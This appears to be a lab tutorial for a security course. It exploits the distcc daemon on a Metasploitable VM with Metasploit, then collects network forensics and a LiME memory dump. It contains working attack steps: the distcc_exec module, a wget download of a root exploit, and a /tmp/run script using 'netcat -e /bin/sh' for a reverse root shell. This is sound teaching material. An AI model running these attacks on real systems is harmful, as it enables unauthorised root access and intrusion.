Lesson 2)
{ Exploit the distcc
daemon to obtain root, Collect Lime Memory Dump }
Section 0. Background
Information |
- Metasploitable
- Pre-Requisite Lab
- What is distcc
- distcc is designed to speed up compilation
by taking advantage of unused processing power on other computers. A
machine with distcc installed can send code to be compiled across the
network to a computer which has the distccd daemon and a compatible
compiler installed.
- Exploit CVE 2004-2687
- distcc 2.x, as used in XCode 1.5 and
others, when not configured to restrict access to the server port,
allows remote attackers to execute arbitrary commands via compilation
jobs, which are executed by the server without authorization checks.
- Exploit CVE 2009-1185
Lab Notes
- In this lab we will do the following:
- Run an intense NMAP Scan on the Metasploitable
- Search for the distcc daemon
- Use Metasploit to exploit the distcc
- Use exploit
to escalate the privilege of the daemon user to root.
- Conduct Basic Network Forensics.
- Create a Lime Forensics Memory Dump.
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Section 1: Start
Up the Metasploitable VM |
- Start Up VMWare Player
- Instructions:
- Click the Start Button
- Type Vmplayer in the search box
- Click on Vmplayer

- Open a Virtual Machine
- Instructions:
- Click on Open a Virtual Machine

- Open the Metasploitable VM
- Instructions:
- Navigate to where the Metasploitable VM
is located
- Click on on the Metasploitable VM
- Click on the Open Button

- Edit the Metasploitable VM
- Instructions:
- Select Metasploitable2-Linux VM
- Click Edit virtual machine settings

- Edit the Metasploitable VM
- Instructions:
- Click on "Network Adapter NAT"
- Select the radio button "Bridged:
Connected directly to the physical network"
- Click on the OK button
- Warning:
- By changing from NAT to Bridged opens
the VM and network up to potential attacks.
- To maintain a safe network, you could
(1) skip this section and only use the host-only network, (2) unplug
your router from the internet, (3) use an ACL to not allow traffic
into your network, etc.

- Play the Metasploitable VM
- Instructions:
- Click on the Metasploitable VM
- Click on Play virtual machine

Section 2: Determine
Metasploitable IP Address |
- Logging into Metasploitable
- Instructions
- Username: msfadmin
- Password: msfadmin
or whatever you changed it to in lesson 1.

- Change the msfadmin password
- Instructions:
- ifconfig -a
- Note(FYI):
- This is the IP Address of the Victim
- My IP Address is
- Record your IP Address.

Section 4: Start
Up the BackTrack5R1 VM |
- Start Up VMWare Player
- Instructions:
- Click the Start Button
- Type Vmplayer in the search box
- Click on Vmplayer

- Open a Virtual Machine
- Instructions:
- Click on Open a Virtual Machine

- Open the BackTrack5R1 VM
- Instructions:
- Navigate to where the BackTrack5R1 VM
is located
- Click on on the BackTrack5R1 VM
- Click on the Open Button

- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings

- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine

- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed
it to>.
- Bring up the GNOME
- Instructions:
- Type startx
- Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address
- In your case, it will probably be
- This is the machine that will be use to
attack the victim machine (Metasploitable).

Section 5: Scanning
the Victim with NMAP |
- Run Intense NMAP Scan on the Metasploitable VM
(Perform On BackTrack)
- Instructions:
- Obtain your Metasploitable IP address
from (Section 2, Step 2)
- In the following step, replace with your Metasploitable IP address.
- nmap -p 1-65535 -T4 -A -v
2>&1 | tee /var/tmp/scan.txt
- Note(FYI):
- This intense NMAP scan could take 3 to
5 minutes to run.

- Looking for distccd
- Instructions:
- grep 3632 /var/tmp/scan.txt
- Note(FYI):
- distccd usually runs on port 3632.

Section 6: Attacking
the Victim with Metasploit |
- Start Up Metasploit msfconsole
On BackTrack)
- Instructions:
- msfconsole.
- Note(FYI):
- Metasploit takes about 5 to 20 seconds
to start up.
- Your picture (Rabbit, Cow, Graffit,
Cyber Missle, etc) will probably be different than mine.

- Choose Metasploit Module
- Instructions:
- search distcc
- use exploit/unix/misc/distcc_exec
- Note(FYI):
- This the name of the exploit that will
be used to attack the DistCC Daemon Command.

- Choose Metasploit Payloads
- Instructions:
- show payloads
- set payload cmd/unix/bind_ruby
- Note(FYI):
- A payload is the piece of software that
lets you control a computer system after it’s been exploited. The
payload is typically attached to and delivered by the exploit. Just
imagine an exploit that carries the payload in its backpack when it
breaks into the system and then leaves the backpack there.

- Show Metasploit Options
- Note(FYI):
- Replace with the
Metasploitable IP Address obtained from (Section 2, Step 2).
- Instructions:
- show options
- set RHOST

- Metasploit Exploit to gain online access
- Note(FYI):
- Once the exploit command is executed,
the following commands will actually be run on the Metasploitable VM:
hostname, ifconfig eth0, and whoami.
- You will not be a prompt after the
exploit is implemented.
- Instructions:
- exploit
- hostname
- ifconfig eth0
- whoami
- Notice the user is daemon.

- Download and Compile Privileged Escalation
- Note(FYI):
- Now we are going to download a
privileged escalation exploit for distcc to escalate the privilege
from user daemon to root.
- This exploit attacks NETLINK 1.4.1
because it does not verify whether a NETLINK message originates from
the kernel space, which allows local users to gain privilege by
sending a NETLINK message from the user space (/tmp/run).
- The (--no-check-certificate)
flag must be used with wget, otherwise you will only download a
zero-byte file.
- Instructions:
- wget
--no-check-certificate http://www.computersecuritystudent.com/DOWNLOADS/8572 -O exploit-8572.c
- ls -l exploit-8572.c
- gcc exploit-8572.c -o exploit-8572
- ls -l exploit-8572*

- Create and Resize Terminal Windows
- Instructions:
- Resize Previous Metasploit Terminal to
consume the upper half of your screen.
- Click on the terminal icon to create a
new window.
- Resize the newly created Terminal to
consume the lower half of your screen.

- Create a Netcat Session
- Note(FYI):
- Now we are going to create a netcat
session in the newly created terminal window listening on port 4444.
- Netcat is a computer networking service
for reading from and writing network connections using TCP or UDP.
- Netcat is often referred to as a
"Swiss-army knife for TCP/IP".
- Instructions:
- netcat -vlp 4444

- Create a Netcat Session
- Note(FYI):
- The following commands will be placed
in the upper terminal window.
- In Step 9.2,
BackTrack's IP address obtain in (Section 4, Step 10).
- Remember to subtract 1 from the process
ID (PID) number from Step 9.3
- Instructions:
- echo '#!/bin/sh' > /tmp/run
- echo '/bin/netcat -e /bin/sh 4444' >> /tmp/run
- ps -eaf | grep udev | grep -v grep
- [1] Record your PID (2709),
[2] subtract 1 (2708),
and [3] supply new PID to the next step.
- ./exploit-8572
- In the bottom window, notice the new
connection between BackTrack and Metasploitable.

- Test the Privileged Escalation Exploit
- Note(FYI):
- The following commands will be placed
in the lower terminal window.
- Notice that the whoami command
identifies you as the root user.
- Instructions:
- whoami
Section 7:
Basic Network Forensics |
- Become Root on the Metasploitable VM
On Metasploitable)
- Note(FYI):
- The following commands will be ran on
the Metasploitable VM.
- Instructions:
- sudo su -
- Supply your msfadmin password
- Piecing Together Network Connections and
Process IDs
- Note(FYI):
- Pay attention to the below picture when
Record your PID for steps 2,
3 and 4.
- Instructions:
- netstat -naop | grep 4444
- ps -eaf | grep
5698 | grep -v grep
- Record your PID associated with Ruby
- ps -eaf | grep
5777 | grep -v grep
- Record your PID associated with
netcat /bin/sh.
- ps -eaf | grep
5776 | grep -v grep
- Record the child PID contained in the
sh grep results.

- Using lsof to view the netcat session
- Note(FYI):
- Pay attention to the below picture when
- Instructions:
- lsof | grep 4444
- Record your PID (eg.
5698) associated with the daemon user
- Record your PID(eg.
5777) associated with the root user

- Using lsof to analyze the daemon process (5698)
- Note(FYI):
- Replace
with the PID your captured in (Section 7, Step 3).
- Instructions:
- lsof | grep
5689 | egrep
- Note(FYI):
- The red dot indicates normal
functioning distcc processes.
- The yellow dot indicates an abnormal
4444 TCP connection, that was spawned from the distcc PID (5698),
going from Metasploitable ( to BackTrack

- Using lsof to analyze root owned netcat session
- Note(FYI):
- Replace the root owned PID(5777)
that you captured in (Section 7, Step 3).
- Instructions:
- lsof | grep
- Note(FYI):
- Notice that there are root established
connections going from Metasploitable ( to BackTrack

- Using ps to analyze the root owned netcat
session (5777)
- Note(FYI):
- Replace the root owned PID(5777)
that you captured in (Section 7, Step 3).
- Instructions:
- ps -eaf | grep -v grep | grep
- The parent ID is
5777, The
Child ID is
Use the Child ID for the next step.
- ps -eaf | grep -v grep | grep
- Notice the shell (/bin/sh) spawned
the process /tmp/run.
- cat /tmp/run
- Remember exploit-8572 attacks
NETLINK that allows a user to run a command (/bin/sh, ie. root
shell) from the user space.

Section 8:
Create Lime Forensics Memory Dump |
- Prepare Forensics Repository Folder (Perform
On Metasploitable)
- Instructions:
- mkdir -p /var/www/distcc
- chown www-data:www-data /var/www/distcc
- chmod 755 /var/www/distcc
- ls -ld /var/www/distcc
- Note(FYI):
- mkdir, creates a directory. The
"-p" flag is used to suppress errors if the directory already

- Create Lime Forensics Memory Dump
- Instructions:
- cd /var/tmp/src
- ls
- insmod ./lime-2.6.24-16-server.ko "path=/var/www/distcc/distcc_memory.lime
- ls -l /var/www/distcc/distcc_memory.lime
- Note(FYI):
- This line will create a dump in the
Lime Forensics Format
- insmod - this is program that
inserts the lime module (lime-2.6.24-16-server.ko) into the
Linux Kernel.
- lime-2.6.24-16-server.ko is the
module that will create the memory dump.

- Create Forensics Files
- Instructions:
- cd /
- netstat -naop > /var/www/distcc/distcc_netstat.txt
- lsof > /var/www/distcc/distcc_lsof.txt
- ps -eaf > /var/www/distcc/distcc_pseaf.txt
- tar zcvf /var/www/distcc/tmp.tar.gz /tmp
- Note(FYI):
- netstat, Display network connections.
- lsof, List open files.
- ps -eaf, Display current
- cd, Change directory.
- tar zcvf, Here we will use tar to zip
up and compress the /tmp directory. Remember data in the
/tmp directory is volatile as well. Once the server is
rebooted, data in the /tmp directory is deleted and often rewritten.
- z, use gzip to compress the
- v, verbosely list files processed
- c, create new archive.
- f, specify archive file, directory
or device

- Create MD5 Checksum
- Instructions:
- cd /var/www/distcc/
- md5sum * | tee distcc_md5.txt

- Proof of Lab (Perform On
- Note(FYI):
- The following commands will be placed
in the lower terminal window.
- Instructions:
- date
- echo "Your Name"
- Replace the string "Your Name" with
your actual name.
- e.g., echo "John Gray"
Proof of Lab
- Press the <Ctrl> and <Alt> key at the
same time.
- Press the <PrtScn> key.
- Paste into a word document
- Upload to Moodle

